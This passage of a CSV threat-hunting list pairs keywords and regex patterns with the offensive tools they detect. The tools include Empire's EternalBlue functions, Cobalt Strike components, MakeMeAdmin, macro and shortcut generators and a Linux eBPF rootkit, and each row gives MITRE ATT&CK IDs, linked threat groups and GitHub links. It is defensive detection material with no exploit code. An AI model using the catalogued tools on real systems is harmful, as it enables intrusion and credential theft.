"*make_smb1_free_hole_session_packet*",".{0,1000}make_smb1_free_hole_session_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51573"
"*make_smb1_nt_trans_packet*",".{0,1000}make_smb1_nt_trans_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51574"
"*make_smb1_trans2_explo*",".{0,1000}make_smb1_trans2_explo.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51575"
"*make_smb2_payload_body_packet*",".{0,1000}make_smb2_payload_body_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51576"
"*make_smb2_payload_headers_packet*",".{0,1000}make_smb2_payload_headers_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51577"
"*makebof.bat*",".{0,1000}makebof\.bat.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","N/A","2","140","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z","51578"
"*MakeHTTPSmugglerJAR.launch*",".{0,1000}MakeHTTPSmugglerJAR\.launch.{0,1000}","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","network exploitation tool","N/A","8","721","107","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z","51579"
"*makeivs-ng -b *",".{0,1000}makeivs\-ng\s\-b\s.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","51580"
"*makemeadmin.com/*",".{0,1000}makemeadmin\.com\/.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","51581"
"*MakeMeAdminRemoteUI.exe*",".{0,1000}MakeMeAdminRemoteUI\.exe.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","51582"
"*MakeMeAdminService.exe*",".{0,1000}MakeMeAdminService\.exe.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","51583"
"*MakeMeAdminService.fr*",".{0,1000}MakeMeAdminService\.fr.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","51584"
"*MakeMeAdminUI.resources.dll*",".{0,1000}MakeMeAdminUI\.resources\.dll.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","51585"
"*MakeMeEnterpriseAdmin.ps1*",".{0,1000}MakeMeEnterpriseAdmin\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","51586"
"*MakeMeEnterpriseAdmin.ps1*",".{0,1000}MakeMeEnterpriseAdmin\.ps1.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","51587"
"*MakeMeEnterpriseAdmin.ps1*",".{0,1000}MakeMeEnterpriseAdmin\.ps1.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","51588"
"*malcomvetter/CSExec*",".{0,1000}malcomvetter\/CSExec.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","1","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","51589"
"*malcomvetter/UnstoppableService*",".{0,1000}malcomvetter\/UnstoppableService.{0,1000}","offensive_tool_keyword","UnstoppableService","a Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interface","T1543.003 - T1564.001 - T1490","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/malcomvetter/UnstoppableService","1","1","N/A","N/A","5","1","66","15","2019-01-19T22:38:18Z","2018-08-07T22:11:22Z","51590"
"*Maldev-Academy/HellHall*",".{0,1000}Maldev\-Academy\/HellHall.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","1","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","51595"
"*maldevel/canisrufus*",".{0,1000}maldevel\/canisrufus.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","1","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","51596"
"*Malicious program execve hijacker executed*",".{0,1000}Malicious\sprogram\sexecve\shijacker\sexecuted.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","51597"
"*Malicious Shortcut Generator*",".{0,1000}Malicious\sShortcut\sGenerator.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","N/A","10","4","327","58","2024-10-22T17:51:10Z","2022-01-03T04:17:11Z","51598"
"*Malicious Shortcut(.lnk) Generator*",".{0,1000}Malicious\sShortcut\(\.lnk\)\sGenerator.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","51599"
"*malicious.csproj*",".{0,1000}malicious\.csproj.{0,1000}","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","N/A","10","1498","256","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z","51600"
"*malicious.dll*",".{0,1000}malicious\.dll.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","51601"
"*MALICIOUS_MAGIC = b""IDOV31""*",".{0,1000}MALICIOUS_MAGIC\s\=\sb\""IDOV31\"".{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","51602"
"*MaliciousInjectedDll.dll*",".{0,1000}MaliciousInjectedDll\.dll.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","N/A","7","1","57","13","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z","51603"
"*MaliciousMacroGenerator*",".{0,1000}MaliciousMacroGenerator.{0,1000}","offensive_tool_keyword","MaliciousMacroGenerator","Simple utility design to generate obfuscated macro that also include a AV / Sandboxes escape mechanism.","T1027 - T1564 - T1127 - T1059 - T1562","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator","1","0","N/A","N/A","N/A","9","828","201","2019-04-17T19:47:38Z","2016-09-21T23:18:14Z","51604"
"*MaliciousMacroMSBuild-master*",".{0,1000}MaliciousMacroMSBuild\-master.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","1","N/A","N/A","8","6","507","123","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z","51605"
"*Malleable C2 Files*",".{0,1000}Malleable\sC2\sFiles.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","N/A","10","10","150","35","2023-12-01T03:18:35Z","2019-02-22T09:36:44Z","51606"
"*Malleable PE/Stage*",".{0,1000}Malleable\sPE\/Stage.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","51607"
"*malleable_redirector.py*",".{0,1000}malleable_redirector\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","51608"
"*malleable_redirector_hidden_api_endpoint*",".{0,1000}malleable_redirector_hidden_api_endpoint.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","51609"
"*Malleable-C2-Profiles*",".{0,1000}Malleable\-C2\-Profiles.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 